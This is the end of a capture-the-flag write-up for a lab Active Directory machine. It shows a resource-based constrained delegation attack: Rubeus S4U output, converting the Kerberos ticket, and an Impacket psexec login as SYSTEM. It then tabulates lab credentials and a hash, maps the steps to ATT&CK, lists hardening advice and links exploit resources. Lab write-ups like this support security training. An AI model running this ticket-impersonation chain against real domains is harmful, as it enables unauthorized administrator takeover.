[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP02$'
[+] TGT request successful!
[*] Building S4U2self request for: 'FAKE-COMP02$@SUPPORT.HTB'
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP02$@SUPPORT.HTB'
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[+] S4U2proxy success!
[+] Ticket successfully imported!
```
Figure 23: Base64-encoded Kerberos ticket for Administrator impersonation
Copy the base64 ticket and convert it for use with Impacket.
```
cat << EOF > ticket.kirbi.b64
[BASE64_TICKET_DATA]
EOF
```
Remove whitespace and decode:
```
cat ticket.kirbi.b64 | tr -d ' \n' | base64 -d > ticket.kirbi
```
Convert to ccache format:
```
ticketConverter.py ticket.kirbi ticket.ccache
```
Export for Impacket:
```
export KRB5CCNAME=ticket.ccache
```
With the Administrator's service ticket, authenticate to the Domain Controller without knowing the password.
```
psexec.py -k -no-pass administrator@dc.support.htb
```
Figure 24: SYSTEM shell obtained via Kerberos authentication - Box Pwned!
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ███████╗██╗ ██╗███████╗████████╗███████╗███╗ ███╗ ║
║ ██╔════╝╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔════╝████╗ ████║ ║
║ ███████╗ ╚████╔╝ ███████╗ ██║ █████╗ ██╔████╔██║ ║
║ ╚════██║ ╚██╔╝ ╚════██║ ██║ ██╔══╝ ██║╚██╔╝██║ ║
║ ███████║ ██║ ███████║ ██║ ███████╗██║ ╚═╝ ██║ ║
║ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ║
║ ║
║ C:\Windows\system32> whoami ║
║ nt authority\system ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ EXFILTRATED CREDENTIALS ║
╠════════════╦══════════════════╦════════════════════════════════════════════╦═══════════════════════════════╣
║ TYPE ║ USERNAME ║ PASSWORD / HASH ║ SOURCE ║
╠════════════╬══════════════════╬════════════════════════════════════════════╬═══════════════════════════════╣
║ LDAP ║ ldap ║ nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz ║ UserInfo.exe Traffic Capture ║
║ Domain ║ support ║ Ironside47pleasure40Watchful ║ LDAP info Attribute ║
║ Machine ║ FAKE-COMP02$ ║ Password123 ║ Created for RBCD Attack ║
║ Hash ║ FAKE-COMP02$ ║ 58A478135A93AC3BF058A5EA0E8FDB71 (RC4) ║ Rubeus Hash Generation ║
╚════════════╩══════════════════╩════════════════════════════════════════════╩═══════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██╗ ██╗███████╗███████╗██████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██║ ██║███████╗█████╗ ██████╔╝ █████╗ ██║ ███████║██║ ███╗ ║
║ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: C:\Users\support\Desktop\user.txt ║
║ FLAG: HTB{********_REDACTED_********} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ ██████╗ ██████╗ ████████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██████╔╝██║ ██║██║ ██║ ██║ █████╗ ██║ ███████║██║ ███╗ ║
║ ██╔══██╗██║ ██║██║ ██║ ██║ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: C:\Users\Administrator\Desktop\root.txt ║
║ FLAG: HTB{********_REDACTED_********} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
| Tactic | Technique ID | Technique Name | Implementation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning: Vulnerability Scanning | RustScan + Nmap service enumeration |
| Resource Development | T1587.001 | Develop Capabilities: Malware | Fake computer account creation |
| Initial Access | T1078.002 | Valid Accounts: Domain Accounts | Credentials from UserInfo.exe traffic |
| Credential Access | T1040 | Network Sniffing | Tshark LDAP simple bind capture |
| Credential Access | T1552.001 | Unsecured Credentials: Credentials in Files | Password in LDAP info attribute |
| Credential Access | T1110.003 | Brute Force: Password Spraying | NetExec password spray attack |
| Discovery | T1087.002 | Account Discovery: Domain Account | BloodHound + LDAP user enumeration |
| Discovery | T1069.002 | Permission Groups Discovery | BloodHound ACL analysis |
| Lateral Movement | T1021.006 | Remote Services: Windows Remote Management | Evil-WinRM shell access |
| Privilege Escalation | T1134.001 | Access Token Manipulation | RBCD with S4U2Self/S4U2Proxy |
| Defense Evasion | T1550.003 | Use Alternate Authentication Material | Kerberos ticket impersonation |
┌──────────────────────────────────────────────────────────────────────────────────┐
│ SECURITY RECOMMENDATIONS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] LDAP Channel Binding & Signing │
│ - Enforce LDAP signing to prevent cleartext credential interception │
│ - Enable channel binding for LDAPS connections │
│ │
│ [2] Credential Hygiene │
│ - Never store passwords in LDAP attributes (info, description, etc.) │
│ - Implement regular password audits using tools like DSInternals │
│ │
│ [3] Machine Account Quota │
│ - Set ms-DS-MachineAccountQuota to 0 for non-admin users │
│ - Monitor for unexpected computer account creation │
│ │
│ [4] Delegation Controls │
│ - Mark sensitive accounts as "Account is sensitive, cannot be delegated" │
│ - Add Administrators to Protected Users group │
│ - Monitor changes to msDS-AllowedToActOnBehalfOfOtherIdentity │
│ │
│ [5] SMB Share Permissions │
│ - Disable null session access to shares │
│ - Audit custom shares for sensitive content │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ HOW TO FIND EXPLOITS & POC SCRIPTS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] IDENTIFY VERSION │
│ ▸ Use nmap, nxc to fingerprint OS and services │
│ ▸ Check LDAP/SMB banners for Windows version │
│ ▸ Example: Windows Server 2022 Build 20348 │
│ │
│ [2] SEARCH EXPLOIT-DB / SEARCHSPLOIT │
│ ▸ searchsploit windows server 2022 │
│ ▸ searchsploit ldap │
│ ▸ searchsploit "constrained delegation" │
│ ▸ https://www.exploit-db.com/ │
│ │
│ [3] SEARCH CVE DATABASES │
│ ▸ https://nvd.nist.gov/ (NIST National Vulnerability Database) │
│ ▸ https://cve.mitre.org/ (CVE List) │
│ ▸ https://msrc.microsoft.com/ (Microsoft Security Response Center) │
│ │
│ [4] GITHUB POC REPOSITORIES │
│ ▸ https://github.com/fortra/impacket (Impacket - AD attacks) │
│ ▸ https://github.com/GhostPack/Rubeus (Kerberos attacks) │
│ ▸ https://github.com/Kevin-Robertson/Powermad (Machine account creation) │
│ ▸ https://github.com/PowerShellMafia/PowerSploit (PowerView) │
│ ▸ https://github.com/nomi-sec/PoC-in-GitHub (PoC aggregator) │
│ │
│ [5] ACTIVE DIRECTORY RESOURCES │
│ ▸ https://book.hacktricks.xyz/windows-hardening/active-directory-methodology │
│ ▸ https://adsecurity.org/ (AD Security Blog) │
│ ▸ https://www.thehacker.recipes/ (AD Attack Recipes) │
│ │
│ [6] SECURITY RESEARCH RESOURCES │
│ ▸ https://github.com/swisskyrepo/PayloadsAllTheThings │
│ ▸ https://www.ired.team/ (Red Team Notes) │
│ ▸ https://posts.specterops.io/ (SpecterOps Blog - BloodHound creators) │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ VULNERABILITIES IN THIS BOX - SEARCH QUERIES │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ SMB Null Session (T1021.002) │
│ ▸ Tools: smbclient, nxc, enum4linux │
│ ▸ "SMB null session enumeration" │
│ │
│ LDAP Simple Bind - Credential Sniffing (T1040) │
│ ▸ Tools: tshark, Wireshark │
│ ▸ Filter: ldap.simple │
│ ▸ "LDAP cleartext credentials simple bind" │
│ │
│ Password in LDAP Attribute (T1552.001) │
│ ▸ Tool: ldapsearch │
│ ▸ "password stored in ldap description info attribute" │
│ ▸ Check: info, description, comment attributes │
│ │
│ GenericAll ACL Abuse │
│ ▸ Tool: BloodHound │
│ ▸ "GenericAll privilege escalation active directory" │
│ ▸ https://bloodhound.readthedocs.io/ │
│ │
│ Resource-Based Constrained Delegation (RBCD) │
│ ▸ Tools: Rubeus, rbcd.py (Impacket), PowerMad │
│ ▸ "RBCD attack msDS-AllowedToActOnBehalfOfOtherIdentity" │
│ ▸ https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd │
│ ▸ S4U2Self / S4U2Proxy attack chain │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ░█▀▀░█░█░█▀▀░▀█▀░█▀▀░█▄█░░░█▀▀░█▀█░█▄█░█▀█░█▀▄░█▀█░█▄█░▀█▀░█▀▀░█▀▀░█▀▄ ║
║ ░▀▀█░░█░░▀▀█░░█░░█▀▀░█░█░░░█░░░█░█░█░█░█▀▀░█▀▄░█░█░█░█░░█░░▀▀█░█▀▀░█░█ ║
║ ░▀▀▀░░▀░░▀▀▀░░▀░░▀▀▀░▀░▀░░░▀▀▀░▀▀▀░▀░▀░▀░░░▀░▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀░ ║
║ ║
║ WRITEUP AUTHOR: Netrunner ║
║ COMPLETION DATE: 2026-01-09 ║
║ ATTACK CHAIN: SMB > Traffic Analysis > LDAP Mining > RBCD > SYSTEM ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════╝